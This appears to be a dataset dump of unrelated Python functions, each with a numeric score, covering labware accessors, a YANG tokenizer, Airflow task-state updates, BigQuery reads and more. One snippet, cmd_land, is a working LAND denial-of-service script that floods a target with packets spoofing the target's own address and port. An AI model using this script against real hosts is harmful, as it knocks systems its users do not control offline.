text
stringlengths
78
104k
score
float64
0
0.18
def wells(self, *args) -> List[Well]: """ Accessor function used to generate a list of wells in top -> down, left -> right order. This is representative of moving down `rows` and across `columns` (e.g. 'A1', 'B1', 'C1'...'A2', 'B2', 'C2') With indexing one can treat it as a typical python list. To access well A1, for example, simply write: labware.wells()[0] Note that this method takes args for backward-compatibility, but use of args is deprecated and will be removed in future versions. Args can be either strings or integers, but must all be the same type (e.g.: `self.wells(1, 4, 8)` or `self.wells('A1', 'B2')`, but `self.wells('A1', 4)` is invalid. :return: Ordered list of all wells in a labware """ if not args: res = self._wells elif isinstance(args[0], int): res = [self._wells[idx] for idx in args] elif isinstance(args[0], str): res = [self.wells_by_index()[idx] for idx in args] else: raise TypeError return res
0.001783
def get_strings(self, need_quote=False): """ret: string""" self.skip() if self.buf[0] == ';' or self.buf[0] == '{' or self.buf[0] == '}': error.err_add(self.errors, self.pos, 'EXPECTED_ARGUMENT', self.buf[0]) raise error.Abort if self.buf[0] == '"' or self.buf[0] == "'": # for double-quoted string, loop over string and translate # escaped characters. also strip leading whitespace as # necessary. # for single-quoted string, keep going until end quote is found. quote_char = self.buf[0] # collect output in strs (list of strings) strs = [] res = [] # remember position of " character indentpos = self.offset i = 1 while True: buflen = len(self.buf) start = i while i < buflen: if self.buf[i] == quote_char: # end-of-string; copy the buf to output res.append(self.buf[start:i]) strs.append((u''.join(res), quote_char)) # and trim buf self.set_buf(i+1) # check for '+' operator self.skip() if self.buf[0] == '+': self.set_buf(1) self.skip() nstrs = self.get_strings(need_quote=True) strs.extend(nstrs) return strs elif (quote_char == '"' and self.buf[i] == '\\' and i < (buflen-1)): # check for special characters special = None if self.buf[i+1] == 'n': special = '\n' elif self.buf[i+1] == 't': special = '\t' elif self.buf[i+1] == '\"': special = '\"' elif self.buf[i+1] == '\\': special = '\\' elif self.strict_quoting and self.is_1_1: error.err_add(self.errors, self.pos, 'ILLEGAL_ESCAPE', self.buf[i+1]) raise error.Abort elif self.strict_quoting: error.err_add(self.errors, self.pos, 'ILLEGAL_ESCAPE_WARN', self.buf[i+1]) if special != None: res.append(self.buf[start:i]) res.append(special) i = i + 1 start = i + 1 i = i + 1 # end-of-line # first strip trailing whitespace in double quoted strings # pre: self.buf[i-1] == '\n' if i > 2 and self.buf[i-2] == '\r': j = i - 3 else: j = i - 2 k = j while j >= 0 and self.buf[j].isspace(): j = j - 1 if j != k: # we found trailing whitespace s = self.buf[start:j+1] + self.buf[k+1:i] else: s = self.buf[start:i] res.append(s) self.readline() i = 0 if quote_char == '"': # skip whitespace used for indentation buflen = len(self.buf) while (i < buflen and self.buf[i].isspace() and i <= indentpos): i = i + 1 if i == buflen: # whitespace only on this line; keep it as is i = 0 elif need_quote == True: error.err_add(self.errors, self.pos, 'EXPECTED_QUOTED_STRING', ()) raise error.Abort else: # unquoted string buflen = len(self.buf) i = 0 while i < buflen: if (self.buf[i].isspace() or self.buf[i] == ';' or self.buf[i] == '{' or self.buf[i] == '}' or self.buf[i:i+2] == '//' or self.buf[i:i+2] == '/*' or self.buf[i:i+2] == '*/'): res = self.buf[:i] self.set_buf(i) return [(res, '')] i = i + 1
0.001284
def Record(self, value): """Records given value.""" self.sum += value self.count += 1 pos = bisect.bisect(self.bins, value) - 1 if pos < 0: pos = 0 elif pos == len(self.bins): pos = len(self.bins) - 1 self.heights[pos] += 1
0.011321
def dump_stats(self, pattern): """Dumps VM statistics. in pattern of type str The selection pattern. A bit similar to filename globbing. """ if not isinstance(pattern, basestring): raise TypeError("pattern can only be an instance of type basestring") self._call("dumpStats", in_p=[pattern])
0.01061
def node_path_to_child(self, node): """Return a list describing the path from this node to a child node If *node* is not a (grand)child of this node, then raise RuntimeError. Parameters ---------- node : instance of Node The child node. Returns ------- path : list | None The path. """ if node is self: return [] # Go up from the child node as far as we can path1 = [node] child = node while child.parent is not None: child = child.parent path1.append(child) # Early exit if child is self: return list(reversed(path1)) # Verify that we're not cut off if path1[-1].parent is None: raise RuntimeError('%r is not a child of %r' % (node, self)) def _is_child(path, parent, child): path.append(parent) if child in parent.children: return path else: for c in parent.children: possible_path = _is_child(path[:], c, child) if possible_path: return possible_path return None # Search from the parent towards the child path2 = _is_child([], self, path1[-1]) if not path2: raise RuntimeError('%r is not a child of %r' % (node, self)) # Return return path2 + list(reversed(path1))
0.002604
def MakeSuiteFromHist(hist, name=None): """Makes a normalized suite from a Hist object. Args: hist: Hist object name: string name Returns: Suite object """ if name is None: name = hist.name # make a copy of the dictionary d = dict(hist.GetDict()) return MakeSuiteFromDict(d, name)
0.002882
def _move_focused_item_into_viewport(self, view, focused_item): """Called when an item is focused, moves the item into the viewport :param view: :param StateView | ConnectionView | PortView focused_item: The focused item """ self.view.editor.handler_block(self.drag_motion_handler_id) self.move_item_into_viewport(focused_item) self.view.editor.handler_unblock(self.drag_motion_handler_id)
0.006726
def ADC(cpu, dest, src): """ Adds with carry. Adds the destination operand (first operand), the source operand (second operand), and the carry (CF) flag and stores the result in the destination operand. The state of the CF flag represents a carry from a previous addition. When an immediate value is used as an operand, it is sign-extended to the length of the destination operand format. The ADC instruction does not distinguish between signed or unsigned operands. Instead, the processor evaluates the result for both data types and sets the OF and CF flags to indicate a carry in the signed or unsigned result, respectively. The SF flag indicates the sign of the signed result. The ADC instruction is usually executed as part of a multibyte or multiword addition in which an ADD instruction is followed by an ADC instruction:: DEST = DEST + SRC + CF; The OF, SF, ZF, AF, CF, and PF flags are set according to the result. :param cpu: current CPU. :param dest: destination operand. :param src: source operand. """ cpu._ADD(dest, src, carry=True)
0.009076
def clean_time(sltime, in_format='%Y-%m-%dT%H:%M:%S%z', out_format='%Y-%m-%d %H:%M'): """Easy way to format time strings :param string sltime: A softlayer formatted time string :param string in_format: Datetime format for strptime :param string out_format: Datetime format for strftime """ try: clean = datetime.datetime.strptime(sltime, in_format) return clean.strftime(out_format) # The %z option only exists with py3.6+ except ValueError: return sltime
0.003906
def cmd_land(ip, count, port, iface, verbose): """This command implements the LAND attack, that sends packets forging the source IP address to be the same that the destination IP. Also uses the same source and destination port. The attack is very old, and can be used to make a Denial of Service on old systems, like Windows NT 4.0. More information here: https://en.wikipedia.org/wiki/LAND \b # sudo habu.land 172.16.0.10 ............ Note: Each dot (.) is a sent packet. You can specify how many packets send with the '-c' option. The default is never stop. Also, you can specify the destination port, with the '-p' option. """ conf.verb = False if iface: conf.iface = iface layer3 = IP() layer3.dst = ip layer3.src = ip layer4 = TCP() layer4.dport = port layer4.sport = port pkt = layer3 / layer4 counter = 0 while True: send(pkt) counter += 1 if verbose: print(pkt.summary()) else: print('.', end='') sys.stdout.flush() if count != 0 and counter == count: break return True
0.000843
def applyCommand(self): """ Applies the current line of code as an interactive python command. """ # generate the command information cursor = self.textCursor() cursor.movePosition(cursor.EndOfLine) line = projex.text.nativestring(cursor.block().text()) at_end = cursor.atEnd() modifiers = QApplication.instance().keyboardModifiers() mod_mode = at_end or modifiers == Qt.ShiftModifier # test the line for information if mod_mode and line.endswith(':'): cursor.movePosition(cursor.EndOfLine) line = re.sub('^>>> ', '', line) line = re.sub('^\.\.\. ', '', line) count = len(line) - len(line.lstrip()) + 4 self.insertPlainText('\n... ' + count * ' ') return False elif mod_mode and line.startswith('...') and \ (line.strip() != '...' or not at_end): cursor.movePosition(cursor.EndOfLine) line = re.sub('^\.\.\. ', '', line) count = len(line) - len(line.lstrip()) self.insertPlainText('\n... ' + count * ' ') return False # if we're not at the end of the console, then add it to the end elif line.startswith('>>>') or line.startswith('...'): # move to the top of the command structure line = projex.text.nativestring(cursor.block().text()) while line.startswith('...'): cursor.movePosition(cursor.PreviousBlock) line = projex.text.nativestring(cursor.block().text()) # calculate the command cursor.movePosition(cursor.EndOfLine) line = projex.text.nativestring(cursor.block().text()) ended = False lines = [] while True: # add the new block lines.append(line) if cursor.atEnd(): ended = True break # move to the next line cursor.movePosition(cursor.NextBlock) cursor.movePosition(cursor.EndOfLine) line = projex.text.nativestring(cursor.block().text()) # check for a new command or the end of the command if not line.startswith('...'): break command = '\n'.join(lines) # if we did not end up at the end of the command block, then # copy it for modification if not (ended and command): self.waitForInput() self.insertPlainText(command.replace('>>> ', '')) cursor.movePosition(cursor.End) return False else: self.waitForInput() return False self.executeCommand(command) return True
0.009542
def to_pandas(self, wrap=False, **kwargs): """ Convert to pandas DataFrame. Execute at once. :param wrap: if True, wrap the pandas DataFrame into a PyODPS DataFrame :return: pandas DataFrame """ try: import pandas as pd except ImportError: raise DependencyNotInstalledError( 'to_pandas requires `pandas` library') def wrapper(result): res = result.values if wrap: from .. import DataFrame return DataFrame(res, schema=self.schema) return res return self.execute(wrapper=wrapper, **kwargs)
0.002959
def find_card_bundles(provider: Provider, deck: Deck) -> Optional[Iterator]: '''each blockchain transaction can contain multiple cards, wrapped in bundles. This method finds and returns those bundles.''' if isinstance(provider, RpcNode): if deck.id is None: raise Exception("deck.id required to listtransactions") p2th_account = provider.getaccount(deck.p2th_address) batch_data = [('getrawtransaction', [i["txid"], 1]) for i in provider.listtransactions(p2th_account)] result = provider.batch(batch_data) if result is not None: raw_txns = [i['result'] for i in result if result] else: raise EmptyP2THDirectory({'error': 'No cards found on this deck.'}) else: if deck.p2th_address is None: raise Exception("deck.p2th_address required to listtransactions") try: raw_txns = (provider.getrawtransaction(i, 1) for i in provider.listtransactions(deck.p2th_address)) except TypeError: raise EmptyP2THDirectory({'error': 'No cards found on this deck.'}) return (card_bundler(provider, deck, i) for i in raw_txns)
0.000816
def fetch_recent_submissions(self, max_duration): """Fetch recent submissions in subreddit with boundaries. Does not include posts within the last day as their scores may not be representative. :param max_duration: When set, specifies the number of days to include """ if max_duration: self.min_date = self.max_date - SECONDS_IN_A_DAY * max_duration for submission in self.subreddit.new(limit=None): if submission.created_utc <= self.min_date: break if submission.created_utc > self.max_date: continue self.submissions[submission.id] = MiniSubmission(submission)
0.002853
def get_cell_length(flow_model): """Get flow direction induced cell length dict. Args: flow_model: Currently, "TauDEM", "ArcGIS", and "Whitebox" are supported. """ assert flow_model.lower() in FlowModelConst.d8_lens return FlowModelConst.d8_lens.get(flow_model.lower())
0.009346
def gammatone_erb_constants(n): """ Constants for using the real bandwidth in the gammatone filter, given its order. Returns a pair :math:`(x, y) = (1/a_n, c_n)`. Based on equations from: ``Holdsworth, J.; Patterson, R.; Nimmo-Smith, I.; Rice, P. Implementing a GammaTone Filter Bank. In: SVOS Final Report, Annex C, Part A: The Auditory Filter Bank. 1988.`` First returned value is a bandwidth compensation for direct use in the gammatone formula: >>> x, y = gammatone_erb_constants(4) >>> central_frequency = 1000 >>> round(x, 3) 1.019 >>> bandwidth = x * erb["moore_glasberg_83"](central_frequency) >>> round(bandwidth, 2) 130.52 Second returned value helps us find the ``3 dB`` bandwidth as: >>> x, y = gammatone_erb_constants(4) >>> central_frequency = 1000 >>> bandwidth3dB = x * y * erb["moore_glasberg_83"](central_frequency) >>> round(bandwidth3dB, 2) 113.55 """ tnt = 2 * n - 2 return (factorial(n - 1) ** 2 / (pi * factorial(tnt) * 2 ** -tnt), 2 * (2 ** (1. / n) - 1) ** .5 )
0.004682
def getProvince(self, default=None): """Return the Province from the Physical or Postal Address """ physical_address = self.getPhysicalAddress().get("state", default) postal_address = self.getPostalAddress().get("state", default) return physical_address or postal_address
0.006431
def recover(self,runAsync=False): """ If the shared configuration store for a site is unavailable, a site in read-only mode will operate in a degraded capacity that allows access to the ArcGIS Server Administrator Directory. You can recover a site if the shared configuration store is permanently lost. The site must be in read-only mode, and the site configuration files must have been copied to the local repository when switching site modes. The recover operation will copy the configuration store from the local repository into the shared configuration store location. The copied local repository will be from the machine in the site where the recover operation is performed. Inputs: runAsync - default False - Decides if this operation must run asynchronously. """ url = self._url + "/recover" params = { "f" : "json", "runAsync" : runAsync } return self._post(url=url, param_dict=params, securityHandler=self._securityHandler, proxy_url=self._proxy_url, proxy_port=self._proxy_port)
0.003922
def JR(self,**kwargs): """ NAME: JR PURPOSE: Calculate the radial action INPUT: +scipy.integrate.quad keywords OUTPUT: J_R(R,vT,vT)/ro/vc + estimate of the error HISTORY: 2010-12-01 - Written - Bovy (NYU) """ if hasattr(self,'_JR'): #pragma: no cover return self._JR (rperi,rap)= self.calcRapRperi(**kwargs) EL= self.calcEL(**kwargs) E, L= EL self._JR= 1./nu.pi*integrate.quad(_JRAxiIntegrand,rperi,rap, args=(E,L,self._pot), **kwargs)[0] return self._JR
0.021157
def meta_select(self, predicate=None, semiJoinDataset=None, semiJoinMeta=None): """ *Wrapper of* ``SELECT`` Wrapper of the :meth:`~.select` function filtering samples only based on metadata. :param predicate: logical predicate on the values of the rows :param semiJoinDataset: an other GMQLDataset :param semiJoinMeta: a list of metadata :return: a new GMQLDataset Example 1:: output_dataset = dataset.meta_select(dataset['patient_age'] < 70) # This statement can be written also as output_dataset = dataset[ dataset['patient_age'] < 70 ] Example 2:: output_dataset = dataset.meta_select( (dataset['tissue_status'] == 'tumoral') & (tumor_tag != 'gbm') | (tumor_tag == 'brca')) # This statement can be written also as output_dataset = dataset[ (dataset['tissue_status'] == 'tumoral') & (tumor_tag != 'gbm') | (tumor_tag == 'brca') ] Example 3:: JUN_POLR2A_TF = HG19_ENCODE_NARROW.meta_select( JUN_POLR2A_TF['antibody_target'] == 'JUN', semiJoinDataset=POLR2A_TF, semiJoinMeta=['cell']) The meta selection predicate can use all the classical equalities and disequalities {>, <, >=, <=, ==, !=} and predicates can be connected by the classical logical symbols {& (AND), | (OR), ~ (NOT)} plus the *isin* function. """ return self.select(meta_predicate=predicate, semiJoinDataset=semiJoinDataset, semiJoinMeta=semiJoinMeta)
0.00826
def supports_heading_type(self, heading_type): """Tests if the given heading type is supported. arg: heading_type (osid.type.Type): a heading Type return: (boolean) - ``true`` if the type is supported, ``false`` otherwise raise: IllegalState - syntax is not a ``HEADING`` raise: NullArgument - ``heading_type`` is ``null`` *compliance: mandatory -- This method must be implemented.* """ # Implemented from template for osid.Metadata.supports_coordinate_type if self._kwargs['syntax'] not in ['``HEADING``']: raise errors.IllegalState() return heading_type in self.get_heading_types
0.002874
def match_files(files, pattern: Pattern): """Yields file name if matches a regular expression pattern.""" for name in files: if re.match(pattern, name): yield name
0.005208
async def pong(self, message: bytes=b'') -> None: """Send pong message.""" if isinstance(message, str): message = message.encode('utf-8') await self._send_frame(message, WSMsgType.PONG)
0.0181
def join(self, join_streamlet, window_config, join_function): """Return a new Streamlet by joining join_streamlet with this streamlet """ from heronpy.streamlet.impl.joinbolt import JoinStreamlet, JoinBolt join_streamlet_result = JoinStreamlet(JoinBolt.INNER, window_config, join_function, self, join_streamlet) self._add_child(join_streamlet_result) join_streamlet._add_child(join_streamlet_result) return join_streamlet_result
0.002008
def handle_options(tool, condition, command, options): """ Handle common options for toolset, specifically sets the following flag variables: - CONFIG_COMMAND to 'command' - OPTIOns for compile to the value of <compileflags> in options - OPTIONS for compile.c to the value of <cflags> in options - OPTIONS for compile.c++ to the value of <cxxflags> in options - OPTIONS for compile.fortran to the value of <fflags> in options - OPTIONs for link to the value of <linkflags> in options """ from b2.build import toolset assert isinstance(tool, basestring) assert is_iterable_typed(condition, basestring) assert command and isinstance(command, basestring) assert is_iterable_typed(options, basestring) toolset.flags(tool, 'CONFIG_COMMAND', condition, [command]) toolset.flags(tool + '.compile', 'OPTIONS', condition, feature.get_values('<compileflags>', options)) toolset.flags(tool + '.compile.c', 'OPTIONS', condition, feature.get_values('<cflags>', options)) toolset.flags(tool + '.compile.c++', 'OPTIONS', condition, feature.get_values('<cxxflags>', options)) toolset.flags(tool + '.compile.fortran', 'OPTIONS', condition, feature.get_values('<fflags>', options)) toolset.flags(tool + '.link', 'OPTIONS', condition, feature.get_values('<linkflags>', options))
0.004386
def set_sail(self, angle): ''' Set the angle of the sail to `angle` degrees :param angle: sail angle :type angle: float between -90 and 90 ''' angle = float(angle) request = self.boatd.post({'value': float(angle)}, '/sail') return request.get('result')
0.006309
def set_state(task, execution_date, upstream=False, downstream=False, future=False, past=False, state=State.SUCCESS, commit=False, session=None): """ Set the state of a task instance and if needed its relatives. Can set state for future tasks (calculated from execution_date) and retroactively for past tasks. Will verify integrity of past dag runs in order to create tasks that did not exist. It will not create dag runs that are missing on the schedule (but it will as for subdag dag runs if needed). :param task: the task from which to work. task.task.dag needs to be set :param execution_date: the execution date from which to start looking :param upstream: Mark all parents (upstream tasks) :param downstream: Mark all siblings (downstream tasks) of task_id, including SubDags :param future: Mark all future tasks on the interval of the dag up until last execution date. :param past: Retroactively mark all tasks starting from start_date of the DAG :param state: State to which the tasks need to be set :param commit: Commit tasks to be altered to the database :param session: database session :return: list of tasks that have been created and updated """ assert timezone.is_localized(execution_date) assert task.dag is not None dag = task.dag latest_execution_date = dag.latest_execution_date assert latest_execution_date is not None # determine date range of dag runs and tasks to consider end_date = latest_execution_date if future else execution_date if 'start_date' in dag.default_args: start_date = dag.default_args['start_date'] elif dag.start_date: start_date = dag.start_date else: start_date = execution_date start_date = execution_date if not past else start_date if dag.schedule_interval == '@once': dates = [start_date] else: dates = dag.date_range(start_date=start_date, end_date=end_date) # find relatives (siblings = downstream, parents = upstream) if needed task_ids = [task.task_id] if downstream: relatives = task.get_flat_relatives(upstream=False) task_ids += [t.task_id for t in relatives] if upstream: relatives = task.get_flat_relatives(upstream=True) task_ids += [t.task_id for t in relatives] # verify the integrity of the dag runs in case a task was added or removed # set the confirmed execution dates as they might be different # from what was provided confirmed_dates = [] drs = DagRun.find(dag_id=dag.dag_id, execution_date=dates) for dr in drs: dr.dag = dag dr.verify_integrity() confirmed_dates.append(dr.execution_date) # go through subdagoperators and create dag runs. We will only work # within the scope of the subdag. We wont propagate to the parent dag, # but we will propagate from parent to subdag. dags = [dag] sub_dag_ids = [] while len(dags) > 0: current_dag = dags.pop() for task_id in task_ids: if not current_dag.has_task(task_id): continue current_task = current_dag.get_task(task_id) if isinstance(current_task, SubDagOperator): # this works as a kind of integrity check # it creates missing dag runs for subdagoperators, # maybe this should be moved to dagrun.verify_integrity drs = _create_dagruns(current_task.subdag, execution_dates=confirmed_dates, state=State.RUNNING, run_id_template=BackfillJob.ID_FORMAT_PREFIX) for dr in drs: dr.dag = current_task.subdag dr.verify_integrity() if commit: dr.state = state session.merge(dr) dags.append(current_task.subdag) sub_dag_ids.append(current_task.subdag.dag_id) # now look for the task instances that are affected TI = TaskInstance # get all tasks of the main dag that will be affected by a state change qry_dag = session.query(TI).filter( TI.dag_id == dag.dag_id, TI.execution_date.in_(confirmed_dates), TI.task_id.in_(task_ids)).filter( or_(TI.state.is_(None), TI.state != state) ) # get *all* tasks of the sub dags if len(sub_dag_ids) > 0: qry_sub_dag = session.query(TI).filter( TI.dag_id.in_(sub_dag_ids), TI.execution_date.in_(confirmed_dates)).filter( or_(TI.state.is_(None), TI.state != state) ) if commit: tis_altered = qry_dag.with_for_update().all() if len(sub_dag_ids) > 0: tis_altered += qry_sub_dag.with_for_update().all() for ti in tis_altered: ti.state = state else: tis_altered = qry_dag.all() if len(sub_dag_ids) > 0: tis_altered += qry_sub_dag.all() return tis_altered
0.000973
def sign(self, pairs): """ Generate a signature for a sequence of (key, value) pairs @param pairs: The pairs to sign, in order @type pairs: sequence of (str, str) @return: The binary signature of this sequence of pairs @rtype: str """ kv = kvform.seqToKV(pairs) try: mac = self._macs[self.assoc_type] except KeyError: raise ValueError( 'Unknown association type: %r' % (self.assoc_type,)) return mac(self.secret, kv)
0.003623
def get_jobs_url(self, job_id): # type: (Text) -> Text """ Returns the URL to check job status. :param job_id: The ID of the job to check. """ return compat.urllib_parse.urlunsplit(( self.uri.scheme, self.uri.netloc, self.uri.path.rstrip('/') + '/jobs/' + job_id, self.uri.query, self.uri.fragment, ))
0.006977
def cli(env, identifier, count): """Get details for a ticket.""" mgr = SoftLayer.TicketManager(env.client) ticket_id = helpers.resolve_id(mgr.resolve_ids, identifier, 'ticket') env.fout(ticket.get_ticket_results(mgr, ticket_id, update_count=count))
0.003759
def disable(self, clear_cache=True): """ Disable the cache and clear its contents :param clear_cache: clear the cache contents as well as disabling (defaults to True) """ logger.debug('disable(clear_cache={})'.format(clear_cache)) if clear_cache: self.clear() self.options.enabled = False logger.info('cache disabled')
0.007595
def fileSave(self, filePath=None, updatePath=False): """Write the internal JSON data dictionary to a JSON data file. If no file path is provided, the stored data file path will be used. Args: filePath (Optional[str]): A relative or absolute path to a '.json' file. Defaults to None. updatePath (Optional[bool]): Specifies whether or not to update the stored data file path. Defaults to False. """ if not filePath: filePath = self.filePath if not os.path.isfile(filePath): print("Data file '%s' does not exist, will create new file." % (filePath)) if not os.path.exists(os.path.split(filePath)[0]): os.makedirs(os.path.split(filePath)[0]) dataJsonString = json.dumps(self.data, indent=4, sort_keys=True) print("Writing to file '%s' ... " % (filePath), end="", flush=True) with open(filePath, "w") as fileout: fileout.write(dataJsonString) print("Wrote file!") if updatePath: self.filePath = filePath
0.002676
def pfxdtag(tag): """ Return short-form prefixed tag from fully qualified (Clark notation) tagname. """ uri, tagroot = tag[1:].split('}') prefix = reverse_nsmap[uri] return '%s:%s' % (prefix, tagroot)
0.004386
def new_value(self, key, value): """Create new value in data""" data = self.model.get_data() data[key] = value self.set_data(data)
0.012048
def log(level, message): """ Publish `message` with the `level` the redis `channel`. :param level: the level of the message :param message: the message you want to log """ if redis_instance is None: __connect() if level not in __error_levels: raise InvalidErrorLevel('You have used an invalid error level. \ Please choose in: ' + ', '.join(__error_levels)) if channel is None: raise NoChannelError('Please set a channel.') c = '{channel}.{level}'.format(channel=channel, level=level) redis_instance.publish(c, message)
0.001667
def send_left(self, count): """ Sends the given number of left key presses. """ for i in range(count): self.interface.send_key(Key.LEFT)
0.011111
def add_to_archive(self, spec): ''' Add files and commands to archive Use InsightsSpec.get_output() to get data ''' if isinstance(spec, InsightsCommand): archive_path = os.path.join(self.cmd_dir, spec.archive_path.lstrip('/')) if isinstance(spec, InsightsFile): archive_path = self.get_full_archive_path(spec.archive_path.lstrip('/')) output = spec.get_output() if output: write_data_to_file(output, archive_path)
0.007797
def read_rows( self, read_position, retry=google.api_core.gapic_v1.method.DEFAULT, timeout=google.api_core.gapic_v1.method.DEFAULT, metadata=None, ): """ Reads rows from the table in the format prescribed by the read session. Each response contains one or more table rows, up to a maximum of 10 MiB per response; read requests which attempt to read individual rows larger than this will fail. Each request also returns a set of stream statistics reflecting the estimated total number of rows in the read stream. This number is computed based on the total table size and the number of active streams in the read session, and may change as other streams continue to read data. Example: >>> from google.cloud import bigquery_storage_v1beta1 >>> >>> client = bigquery_storage_v1beta1.BigQueryStorageClient() >>> >>> # TODO: Initialize ``table_reference``: >>> table_reference = { ... 'project_id': 'your-data-project-id', ... 'dataset_id': 'your_dataset_id', ... 'table_id': 'your_table_id', ... } >>> >>> # TODO: Initialize `parent`: >>> parent = 'projects/your-billing-project-id' >>> >>> session = client.create_read_session(table_reference, parent) >>> read_position = bigquery_storage_v1beta1.types.StreamPosition( ... stream=session.streams[0], # TODO: Read the other streams. ... ) >>> >>> for element in client.read_rows(read_position): ... # process element ... pass Args: read_position (Union[ \ dict, \ ~google.cloud.bigquery_storage_v1beta1.types.StreamPosition \ ]): Required. Identifier of the position in the stream to start reading from. The offset requested must be less than the last row read from ReadRows. Requesting a larger offset is undefined. If a dict is provided, it must be of the same form as the protobuf message :class:`~google.cloud.bigquery_storage_v1beta1.types.StreamPosition` retry (Optional[google.api_core.retry.Retry]): A retry object used to retry requests. If ``None`` is specified, requests will not be retried. timeout (Optional[float]): The amount of time, in seconds, to wait for the request to complete. Note that if ``retry`` is specified, the timeout applies to each individual attempt. metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata that is provided to the method. Returns: ~google.cloud.bigquery_storage_v1beta1.reader.ReadRowsStream: An iterable of :class:`~google.cloud.bigquery_storage_v1beta1.types.ReadRowsResponse`. Raises: google.api_core.exceptions.GoogleAPICallError: If the request failed for any reason. google.api_core.exceptions.RetryError: If the request failed due to a retryable error and retry attempts failed. ValueError: If the parameters are invalid. """ gapic_client = super(BigQueryStorageClient, self) stream = gapic_client.read_rows( read_position, retry=retry, timeout=timeout, metadata=metadata ) return reader.ReadRowsStream( stream, gapic_client, read_position, {"retry": retry, "timeout": timeout, "metadata": metadata}, )
0.000776
def allocate_sync_ensembles(dynamic, tolerance = 0.1, threshold = 1.0, ignore = None): """! @brief Allocate clusters in line with ensembles of synchronous oscillators where each synchronous ensemble corresponds to only one cluster. @param[in] dynamic (dynamic): Dynamic of each oscillator. @param[in] tolerance (double): Maximum error for allocation of synchronous ensemble oscillators. @param[in] threshold (double): Amlitude trigger when spike is taken into account. @param[in] ignore (bool): Set of indexes that shouldn't be taken into account. @return (list) Grours (lists) of indexes of synchronous oscillators, for example, [ [index_osc1, index_osc3], [index_osc2], [index_osc4, index_osc5] ]. """ descriptors = [ [] for _ in range(len(dynamic[0])) ]; # Check from the end for obtaining result for index_dyn in range(0, len(dynamic[0]), 1): if ((ignore is not None) and (index_dyn in ignore)): continue; time_stop_simulation = len(dynamic) - 1; active_state = False; if (dynamic[time_stop_simulation][index_dyn] > threshold): active_state = True; # if active state is detected, it means we don't have whole oscillatory period for the considered oscillator, should be skipped. if (active_state is True): while ( (dynamic[time_stop_simulation][index_dyn] > threshold) and (time_stop_simulation > 0) ): time_stop_simulation -= 1; # if there are no any oscillation than let's consider it like noise if (time_stop_simulation == 0): continue; # reset active_state = False; desc = [0, 0, 0]; # end, start, average time of oscillation for t in range(time_stop_simulation, 0, -1): if ( (dynamic[t][index_dyn] > threshold) and (active_state is False) ): desc[0] = t; active_state = True; elif ( (dynamic[t][index_dyn] < threshold) and (active_state is True) ): desc[1] = t; active_state = False; break; if (desc == [0, 0, 0]): continue; desc[2] = desc[1] + (desc[0] - desc[1]) / 2.0; descriptors[index_dyn] = desc; # Cluster allocation sync_ensembles = []; desc_sync_ensembles = []; for index_desc in range(0, len(descriptors), 1): if (descriptors[index_desc] == []): continue; if (len(sync_ensembles) == 0): desc_ensemble = descriptors[index_desc]; reducer = (desc_ensemble[0] - desc_ensemble[1]) * tolerance; desc_ensemble[0] = desc_ensemble[2] + reducer; desc_ensemble[1] = desc_ensemble[2] - reducer; desc_sync_ensembles.append(desc_ensemble); sync_ensembles.append([ index_desc ]); else: oscillator_captured = False; for index_ensemble in range(0, len(sync_ensembles), 1): if ( (desc_sync_ensembles[index_ensemble][0] > descriptors[index_desc][2]) and (desc_sync_ensembles[index_ensemble][1] < descriptors[index_desc][2])): sync_ensembles[index_ensemble].append(index_desc); oscillator_captured = True; break; if (oscillator_captured is False): desc_ensemble = descriptors[index_desc]; reducer = (desc_ensemble[0] - desc_ensemble[1]) * tolerance; desc_ensemble[0] = desc_ensemble[2] + reducer; desc_ensemble[1] = desc_ensemble[2] - reducer; desc_sync_ensembles.append(desc_ensemble); sync_ensembles.append([ index_desc ]); return sync_ensembles;
0.023489
def lstlec(string, n, lenvals, array): """ Given a character string and an ordered array of character strings, find the index of the largest array element less than or equal to the given string. http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lstlec_c.html :param string: Upper bound value to search against. :type string: str :param n: Number elements in array. :type n: int :param lenvals: String length. :type lenvals: int :param array: Array of possible lower bounds. :type array: list :return: index of the last element of array that is lexically less than or equal to string. :rtype: int """ string = stypes.stringToCharP(string) array = stypes.listToCharArrayPtr(array, xLen=lenvals, yLen=n) n = ctypes.c_int(n) lenvals = ctypes.c_int(lenvals) return libspice.lstlec_c(string, n, lenvals, array)
0.001087
def ip_address(self, container: Container ) -> Union[IPv4Address, IPv6Address]: """ The IP address used by a given container, or None if no IP address has been assigned to that container. """ r = self.__api.get('containers/{}/ip'.format(container.uid)) if r.status_code == 200: return r.json() self.__api.handle_erroneous_response(r)
0.009112
def cache_return(func): """Cache the return value of a function without arguments""" _cache = [] def wrap(): if not _cache: _cache.append(func()) return _cache[0] return wrap
0.004545
def get_gpu_ids(): """Get the IDs of the GPUs that are available to the worker. If the CUDA_VISIBLE_DEVICES environment variable was set when the worker started up, then the IDs returned by this method will be a subset of the IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range [0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has. Returns: A list of GPU IDs. """ if _mode() == LOCAL_MODE: raise Exception("ray.get_gpu_ids() currently does not work in PYTHON " "MODE.") all_resource_ids = global_worker.raylet_client.resource_ids() assigned_ids = [ resource_id for resource_id, _ in all_resource_ids.get("GPU", []) ] # If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in # the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should be # returned). if global_worker.original_gpu_ids is not None: assigned_ids = [ global_worker.original_gpu_ids[gpu_id] for gpu_id in assigned_ids ] return assigned_ids
0.000899
def list_files(self, prefix, flat=False): """ List the files in the layer with the given prefix. flat means only generate one level of a directory, while non-flat means generate all file paths with that prefix. """ layer_path = self.get_path_to_file("") path = os.path.join(layer_path, prefix) for blob in self._bucket.list_blobs(prefix=path): filename = blob.name.replace(layer_path, '') if not flat and filename[-1] != '/': yield filename elif flat and '/' not in blob.name.replace(path, ''): yield filename
0.011864
